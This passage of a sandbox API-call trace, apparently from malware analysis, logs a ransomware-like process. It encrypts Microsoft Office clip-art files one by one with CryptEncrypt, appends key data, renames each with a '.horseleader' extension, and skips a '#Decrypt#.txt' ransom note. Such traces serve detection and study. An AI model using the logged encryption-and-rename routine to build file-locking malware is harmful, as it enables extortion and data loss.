[0252.554] CloseHandle (hObject=0x158) returned 1 [0252.554] GetProcessHeap () returned 0x780000 [0252.554] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.554] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.horseleader") returned 79 [0252.555] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.horseleader")) returned 1 [0252.556] GetProcessHeap () returned 0x780000 [0252.556] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.556] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a04e500, ftCreationTime.dwHighDateTime=0x1bd4e61, 
ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2a04e500, ftLastWriteTime.dwHighDateTime=0x1bd4e61, nFileSizeHigh=0x0, nFileSizeLow=0x1126, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00172_.GIF", cAlternateFileName="")) returned 1 [0252.556] lstrcmpiW (lpString1="AG00172_.GIF", lpString2="Windows") returned -1 [0252.556] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 67 [0252.556] StrStrIW (lpFirst="AG00172_.GIF", lpSrch=".horseleader") returned 0x0 [0252.556] lstrcmpW (lpString1="AG00172_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.556] lstrcmpW (lpString1="AG00172_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.556] lstrlenW (lpString=".testttjffg") returned 11 [0252.556] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.556] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.556] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.558] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 67 [0252.558] StrStrW (lpFirst="AG00172_.GIF", lpSrch=".txt") returned 0x0 [0252.558] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: 
lpFileSize=0x32aedd0*=4390) returned 1 [0252.558] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1126, lpOverlapped=0x0) returned 1 [0252.561] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeeda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.561] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1126, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1126, lpOverlapped=0x0) returned 1 [0252.561] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.561] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.561] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.562] CloseHandle (hObject=0x158) returned 1 [0252.562] GetProcessHeap () returned 0x780000 [0252.562] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.562] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.horseleader") returned 79 [0252.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.horseleader" (normalized: 
"c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.horseleader")) returned 1 [0252.563] GetProcessHeap () returned 0x780000 [0252.563] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.563] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde4d3e00, ftCreationTime.dwHighDateTime=0x1bd4e56, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xde4d3e00, ftLastWriteTime.dwHighDateTime=0x1bd4e56, nFileSizeHigh=0x0, nFileSizeLow=0xf7e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00174_.GIF", cAlternateFileName="")) returned 1 [0252.564] lstrcmpiW (lpString1="AG00174_.GIF", lpString2="Windows") returned -1 [0252.564] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 67 [0252.564] StrStrIW (lpFirst="AG00174_.GIF", lpSrch=".horseleader") returned 0x0 [0252.564] lstrcmpW (lpString1="AG00174_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.564] lstrcmpW (lpString1="AG00174_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.564] lstrlenW (lpString=".testttjffg") returned 11 [0252.564] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.564] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.564] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.565] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.565] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 67 [0252.565] StrStrW (lpFirst="AG00174_.GIF", lpSrch=".txt") returned 0x0 [0252.565] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3966) returned 1 [0252.565] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf7e, lpOverlapped=0x0) returned 1 [0252.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff082, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.568] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf7e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf7e, lpOverlapped=0x0) returned 1 [0252.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.568] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.568] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.568] CloseHandle (hObject=0x158) returned 1 [0252.569] GetProcessHeap () returned 0x780000 [0252.569] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.569] wnsprintfW (in: pszDest=0x7dc820, 
cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.horseleader") returned 79 [0252.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.horseleader")) returned 1 [0252.570] GetProcessHeap () returned 0x780000 [0252.570] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.570] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc18a400, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc18a400, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0xd32, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00175_.GIF", cAlternateFileName="")) returned 1 [0252.570] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="Windows") returned -1 [0252.570] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 67 [0252.570] StrStrIW (lpFirst="AG00175_.GIF", lpSrch=".horseleader") returned 0x0 [0252.570] lstrcmpW (lpString1="AG00175_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.570] lstrcmpW (lpString1="AG00175_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.570] lstrlenW (lpString=".testttjffg") returned 11 [0252.570] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.570] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.571] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.571] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 67 [0252.571] StrStrW (lpFirst="AG00175_.GIF", lpSrch=".txt") returned 0x0 [0252.571] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3378) returned 1 [0252.572] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd32, lpOverlapped=0x0) returned 1 [0252.574] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.574] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd32, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd32, lpOverlapped=0x0) returned 1 [0252.574] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.575] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.575] WriteFile (in: 
hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.575] CloseHandle (hObject=0x158) returned 1 [0252.575] GetProcessHeap () returned 0x780000 [0252.575] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.575] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.horseleader") returned 79 [0252.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.horseleader")) returned 1 [0252.576] GetProcessHeap () returned 0x780000 [0252.576] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.576] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3cb900, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6e3cb900, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0xc30, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00176_.GIF", cAlternateFileName="")) returned 1 [0252.577] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="Windows") returned -1 [0252.577] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 67 [0252.577] StrStrIW (lpFirst="AG00176_.GIF", 
lpSrch=".horseleader") returned 0x0 [0252.578] lstrcmpW (lpString1="AG00176_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.578] lstrcmpW (lpString1="AG00176_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.578] lstrlenW (lpString=".testttjffg") returned 11 [0252.578] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.579] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 67 [0252.579] StrStrW (lpFirst="AG00176_.GIF", lpSrch=".txt") returned 0x0 [0252.579] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3120) returned 1 [0252.579] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc30, lpOverlapped=0x0) returned 1 [0252.581] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff3d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.581] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc30, 
lpOverlapped=0x0) returned 1 [0252.581] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.581] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.582] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.582] CloseHandle (hObject=0x158) returned 1 [0252.582] GetProcessHeap () returned 0x780000 [0252.582] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.582] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.horseleader") returned 79 [0252.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.horseleader")) returned 1 [0252.583] GetProcessHeap () returned 0x780000 [0252.583] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.583] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a5f2300, ftCreationTime.dwHighDateTime=0x1bd4af1, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a5f2300, ftLastWriteTime.dwHighDateTime=0x1bd4af1, nFileSizeHigh=0x0, 
nFileSizeLow=0xbd2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00010_.WMF", cAlternateFileName="")) returned 1 [0252.583] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="Windows") returned -1 [0252.583] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 67 [0252.583] StrStrIW (lpFirst="AN00010_.WMF", lpSrch=".horseleader") returned 0x0 [0252.583] lstrcmpW (lpString1="AN00010_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.583] lstrcmpW (lpString1="AN00010_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.583] lstrlenW (lpString=".testttjffg") returned 11 [0252.583] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.583] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.584] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.585] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 67 [0252.585] StrStrW (lpFirst="AN00010_.WMF", lpSrch=".txt") returned 0x0 [0252.585] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3026) returned 1 [0252.585] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0xbd2, lpOverlapped=0x0) returned 1 [0252.592] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff42e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.592] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xbd2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xbd2, lpOverlapped=0x0) returned 1 [0252.592] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.592] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.592] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.593] CloseHandle (hObject=0x158) returned 1 [0252.593] GetProcessHeap () returned 0x780000 [0252.593] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.593] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.horseleader") returned 79 [0252.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.horseleader")) returned 1 [0252.594] GetProcessHeap () returned 0x780000 [0252.594] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.594] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1c4f00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab1c4f00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00015_.WMF", cAlternateFileName="")) returned 1 [0252.594] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="Windows") returned -1 [0252.594] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 67 [0252.594] StrStrIW (lpFirst="AN00015_.WMF", lpSrch=".horseleader") returned 0x0 [0252.594] lstrcmpW (lpString1="AN00015_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.595] lstrcmpW (lpString1="AN00015_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.595] lstrlenW (lpString=".testttjffg") returned 11 [0252.595] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.595] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.595] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.595] CreateFileW (lpFileName="\\\\?\\C:\\Program 